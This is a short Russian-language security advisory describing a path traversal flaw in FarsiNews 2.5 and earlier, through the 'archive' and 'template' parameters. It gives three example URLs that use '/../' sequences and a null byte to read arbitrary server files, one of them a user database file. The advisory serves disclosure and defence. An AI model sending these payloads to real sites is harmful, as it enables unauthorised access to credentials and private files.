Программа: FarsiNews 2.1, 2.5 и более ранние версии

Уязвимость существует из-за недостаточной обработки входных данных в параметре "archive"
сценария "index.php" и параметре "template" сценария "show_archives.php".
Удаленный пользователь может с помощью специально сформированного URL
просмотреть произвольные файлы на системе. Пример:

http://victim/index.php?archive=/../users.db.php%00
http://victim/Farsi1/index.php?archive=/../[file-to-read]%00
http://victim/show_archives.php?template=/../../[local-file]%00
 



Оставить мнение